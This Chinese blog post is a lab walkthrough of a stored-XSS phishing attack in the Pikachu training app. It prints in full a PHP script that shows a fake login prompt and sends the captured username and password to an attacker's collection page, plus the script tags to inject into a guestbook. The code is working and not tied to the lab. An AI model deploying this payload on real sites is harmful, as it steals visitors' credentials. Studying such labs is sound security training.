6.XSS-钓鱼攻击展示(存储型xss)

xss钓鱼演示

钓鱼攻击利用页面 D:\phpStudy\WWW\pikachu\pkxss\xfish
修改配置文件里面对应自己的入侵者的IP地址或者域名,对应的路径下的fish.php脚本如下:

<?php
error_reporting(0);
// var_dump($_SERVER);
if ((!isset($_SERVER['PHP_AUTH_USER'])) || (!isset($_SERVER['PHP_AUTH_PW']))) {
//发送认证框,并给出迷惑性的info
    header('Content-type:text/html;charset=utf-8');
    header("WWW-Authenticate: Basic realm='认证'");
    header('HTTP/1.0 401 Unauthorized');
    echo 'Authorization Required.';
    exit;
} else if ((isset($_SERVER['PHP_AUTH_USER'])) && (isset($_SERVER['PHP_AUTH_PW']))){
//将结果发送给搜集信息的后台,请将这里的IP地址修改为管理后台的IP
//    header("Location: http://192.168.1.15/pkxss/xfish/xfish.php?username={$_SERVER[PHP_AUTH_USER]}
	header("Location: http://www.pikachu.net/pkxss/xfish/xfish.php?username={$_SERVER[PHP_AUTH_USER]}
    &password={$_SERVER[PHP_AUTH_PW]}");
}

?>

代码意思:就是将用户输入的账号信息发送到攻击者的平台上。

输入入侵者的IP地址
<script src="http://192.168.0.101/pikachu/pkxss/xfish/fish.php"></script>
基于我的环境如下
<script src='http://www.pikachu.net/pkxss/xfish/fish.php'></script>

在存在存储型xss漏洞的网页上,输入以上代码,永久性存储在网页前端,如果用户警惕不是很高,就会中招
将上面的script攻击代码输入到留言板里面进行提交,就会出现弹窗进行输入账号和密码,每次刷新都会弹窗
在这里插入图片描述

现在攻击者平台没有任何信息
在这里插入图片描述

当用户输入账号和密码,确定以后就会直接提交到攻击的平台上

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

愿听风成曲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值